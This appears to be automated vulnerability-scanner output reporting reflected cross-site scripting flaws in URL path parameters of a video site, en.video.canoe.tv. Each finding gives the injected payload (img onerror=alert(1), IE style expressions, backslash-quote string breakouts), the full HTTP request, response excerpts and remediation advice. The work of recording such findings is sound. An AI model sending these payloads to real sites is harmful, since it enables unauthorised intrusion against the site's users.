Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/96810\'%3bb61018c4722/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8db21<img%20src%3da%20onerror%3dalert(1)>812e35b90d5 was submitted in the REST URL parameter 2. This input was echoed as 8db21<img src=a onerror=alert(1)>812e35b90d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/8db21<img%20src%3da%20onerror%3dalert(1)>812e35b90d5/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4632"><img%20src%3da%20onerror%3dalert(1)>bbd59bea85 was submitted in the REST URL parameter 2. This input was echoed as b4632"><img src=a onerror=alert(1)>bbd59bea85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/b4632"><img%20src%3da%20onerror%3dalert(1)>bbd59bea85/tv-bloopers/88729112001/dumbest-answer-ever/62560578001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f080"><img%20src%3da%20onerror%3dalert(1)>27a1791476c was submitted in the REST URL parameter 3. This input was echoed as 8f080"><img src=a onerror=alert(1)>27a1791476c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopers8f080"><img%20src%3da%20onerror%3dalert(1)>27a1791476c/88729112001/dumbest-answer-ever/62560578001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb6a0\'%3bf7d2af5485d was submitted in the REST URL parameter 2. This input was echoed as fb6a0\\';f7d2af5485d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedyfb6a0\'%3bf7d2af5485d/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9191"><img%20src%3da%20onerror%3dalert(1)>c4c9deedb7 was submitted in the REST URL parameter 2. This input was echoed as f9191"><img src=a onerror=alert(1)>c4c9deedb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedyf9191"><img%20src%3da%20onerror%3dalert(1)>c4c9deedb7/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6ce36<x%20style%3dx%3aexpression(alert(1))>c9ae79b4c97 was submitted in the REST URL parameter 2. This input was echoed as 6ce36<x style=x:expression(alert(1))>c9ae79b4c97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/comedy6ce36<x%20style%3dx%3aexpression(alert(1))>c9ae79b4c97/tv-bloopers/88729112001/dumbest-contestant-ever/33823613001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 402b9"><img%20src%3da%20onerror%3dalert(1)>1ddcf2021e was submitted in the REST URL parameter 3. This input was echoed as 402b9"><img src=a onerror=alert(1)>1ddcf2021e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopers402b9"><img%20src%3da%20onerror%3dalert(1)>1ddcf2021e/88729112001/dumbest-contestant-ever/33823613001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9590c<img%20src%3da%20onerror%3dalert(1)>d72c5d4840 was submitted in the REST URL parameter 2. This input was echoed as 9590c<img src=a onerror=alert(1)>d72c5d4840 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy9590c<img%20src%3da%20onerror%3dalert(1)>d72c5d4840/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 66b1a\'%3b7086606ef59 was submitted in the REST URL parameter 2. This input was echoed as 66b1a\\';7086606ef59 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedy66b1a\'%3b7086606ef59/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="medium" content ...[SNIP]... <![CDATA[
function OmnitureVariables(){ this.mainsection = 'video'; this.sectionLevel2 = 'Comedy66b1a\\';7086606ef59'; // modified by VIDEO APP this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP this.sectionLevel4 = 'Excited Contestant Crashes Off Stage'; // modified by VIDEO APP this.sectionLevel5 = '' ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a3cc"><img%20src%3da%20onerror%3dalert(1)>89f453c35f1 was submitted in the REST URL parameter 2. This input was echoed as 3a3cc"><img src=a onerror=alert(1)>89f453c35f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy3a3cc"><img%20src%3da%20onerror%3dalert(1)>89f453c35f1/tv-bloopers/88729112001/excited-contestant-crashes-off-stage/16639515001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aff6"><img%20src%3da%20onerror%3dalert(1)>43baf1b28f1 was submitted in the REST URL parameter 3. This input was echoed as 5aff6"><img src=a onerror=alert(1)>43baf1b28f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopers5aff6"><img%20src%3da%20onerror%3dalert(1)>43baf1b28f1/88729112001/excited-contestant-crashes-off-stage/16639515001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb502"style%3d"x%3aexpression(alert(1))"b653ff4a1e was submitted in the REST URL parameter 2. This input was echoed as fb502"style="x:expression(alert(1))"b653ff4a1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /video/comedyfb502"style%3d"x%3aexpression(alert(1))"b653ff4a1e/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8ce5\'%3bac2303b862d was submitted in the REST URL parameter 2. This input was echoed as a8ce5\\';ac2303b862d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedya8ce5\'%3bac2303b862d/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="medium" content ...[SNIP]... <![CDATA[
function OmnitureVariables(){ this.mainsection = 'video'; this.sectionLevel2 = 'Comedya8ce5\\';ac2303b862d'; // modified by VIDEO APP this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP this.sectionLevel4 = 'Inappropriate Game Show Answer'; // modified by VIDEO APP this.sectionLevel5 = ''; thi ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 24875<img%20src%3da%20onerror%3dalert(1)>653fb89e991 was submitted in the REST URL parameter 2. This input was echoed as 24875<img src=a onerror=alert(1)>653fb89e991 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy24875<img%20src%3da%20onerror%3dalert(1)>653fb89e991/tv-bloopers/88729112001/inappropriate-game-show-answer/675517346001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b70"><img%20src%3da%20onerror%3dalert(1)>f5a005404a0 was submitted in the REST URL parameter 3. This input was echoed as 79b70"><img src=a onerror=alert(1)>f5a005404a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopers79b70"><img%20src%3da%20onerror%3dalert(1)>f5a005404a0/88729112001/inappropriate-game-show-answer/675517346001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab8a9\'%3bfcea6025d4d was submitted in the REST URL parameter 2. This input was echoed as ab8a9\\';fcea6025d4d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedyab8a9\'%3bfcea6025d4d/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0220"><img%20src%3da%20onerror%3dalert(1)>7a0cfe50ad7 was submitted in the REST URL parameter 2. This input was echoed as d0220"><img src=a onerror=alert(1)>7a0cfe50ad7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedyd0220"><img%20src%3da%20onerror%3dalert(1)>7a0cfe50ad7/tv-bloopers/88729112001/millionaire-computer-crash/35606096001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bee6c"><img%20src%3da%20onerror%3dalert(1)>caaa4866215 was submitted in the REST URL parameter 3. This input was echoed as bee6c"><img src=a onerror=alert(1)>caaa4866215 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopersbee6c"><img%20src%3da%20onerror%3dalert(1)>caaa4866215/88729112001/millionaire-computer-crash/35606096001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83d43\'%3baf4b951ad79 was submitted in the REST URL parameter 2. This input was echoed as 83d43\\';af4b951ad79 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedy83d43\'%3baf4b951ad79/tv-bloopers/88729112001/price-is-right-moron/11860998001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="medium" content ...[SNIP]... <![CDATA[
function OmnitureVariables(){ this.mainsection = 'video'; this.sectionLevel2 = 'Comedy83d43\\';af4b951ad79'; // modified by VIDEO APP this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP this.sectionLevel4 = 'Price is Right Moron'; // modified by VIDEO APP this.sectionLevel5 = ''; this.sectionL ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21465"><img%20src%3da%20onerror%3dalert(1)>254cc953763 was submitted in the REST URL parameter 2. This input was echoed as 21465"><img src=a onerror=alert(1)>254cc953763 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy21465"><img%20src%3da%20onerror%3dalert(1)>254cc953763/tv-bloopers/88729112001/price-is-right-moron/11860998001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82aa8<img%20src%3da%20onerror%3dalert(1)>74109a378e1 was submitted in the REST URL parameter 2. This input was echoed as 82aa8<img src=a onerror=alert(1)>74109a378e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy82aa8<img%20src%3da%20onerror%3dalert(1)>74109a378e1/tv-bloopers/88729112001/price-is-right-moron/11860998001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97015"><img%20src%3da%20onerror%3dalert(1)>56e41c13320 was submitted in the REST URL parameter 3. This input was echoed as 97015"><img src=a onerror=alert(1)>56e41c13320 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopers97015"><img%20src%3da%20onerror%3dalert(1)>56e41c13320/88729112001/price-is-right-moron/11860998001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8030e"><img%20src%3da%20onerror%3dalert(1)>6ff88039dd was submitted in the REST URL parameter 2. This input was echoed as 8030e"><img src=a onerror=alert(1)>6ff88039dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy8030e"><img%20src%3da%20onerror%3dalert(1)>6ff88039dd/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 38197<img%20src%3da%20onerror%3dalert(1)>c942ba4345e was submitted in the REST URL parameter 2. This input was echoed as 38197<img src=a onerror=alert(1)>c942ba4345e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy38197<img%20src%3da%20onerror%3dalert(1)>c942ba4345e/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 859c5\'%3b0b5714855ce was submitted in the REST URL parameter 2. This input was echoed as 859c5\\';0b5714855ce in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedy859c5\'%3b0b5714855ce/tv-bloopers/88729112001/the-price-is-right-miracle/5196372001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="medium" content ...[SNIP]... <![CDATA[
function OmnitureVariables(){ this.mainsection = 'video'; this.sectionLevel2 = 'Comedy859c5\\';0b5714855ce'; // modified by VIDEO APP this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP this.sectionLevel4 = 'The Price is Right Miracle'; // modified by VIDEO APP this.sectionLevel5 = ''; this.se ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5744"><img%20src%3da%20onerror%3dalert(1)>dfe06be9ae0 was submitted in the REST URL parameter 3. This input was echoed as d5744"><img src=a onerror=alert(1)>dfe06be9ae0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopersd5744"><img%20src%3da%20onerror%3dalert(1)>dfe06be9ae0/88729112001/the-price-is-right-miracle/5196372001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ebe2"><img%20src%3da%20onerror%3dalert(1)>5bbad39924e was submitted in the REST URL parameter 2. This input was echoed as 2ebe2"><img src=a onerror=alert(1)>5bbad39924e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy2ebe2"><img%20src%3da%20onerror%3dalert(1)>5bbad39924e/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 327bb<img%20src%3da%20onerror%3dalert(1)>11653feaac3 was submitted in the REST URL parameter 2. This input was echoed as 327bb<img src=a onerror=alert(1)>11653feaac3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy327bb<img%20src%3da%20onerror%3dalert(1)>11653feaac3/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d42c1\'%3b50ed6b76637 was submitted in the REST URL parameter 2. This input was echoed as d42c1\\';50ed6b76637 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /video/comedyd42c1\'%3b50ed6b76637/tv-bloopers/88729112001/wheel-of-fortune-idiots/22186674001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="medium" content ...[SNIP]... <![CDATA[
function OmnitureVariables(){ this.mainsection = 'video'; this.sectionLevel2 = 'Comedyd42c1\\';50ed6b76637'; // modified by VIDEO APP this.sectionLevel3 = 'TV Bloopers'; // modified by VIDEO APP this.sectionLevel4 = 'Wheel of Fortune idiots'; // modified by VIDEO APP this.sectionLevel5 = ''; this.secti ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffdd5"><img%20src%3da%20onerror%3dalert(1)>ce1d461803a was submitted in the REST URL parameter 3. This input was echoed as ffdd5"><img src=a onerror=alert(1)>ce1d461803a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /video/comedy/tv-bloopersffdd5"><img%20src%3da%20onerror%3dalert(1)>ce1d461803a/88729112001/wheel-of-fortune-idiots/22186674001 HTTP/1.1 Host: en.video.canoe.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
